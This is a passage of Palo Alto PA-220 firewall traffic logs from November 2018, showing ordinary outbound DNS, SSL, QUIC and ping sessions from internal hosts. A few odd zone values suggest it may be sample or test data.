16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 
16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 
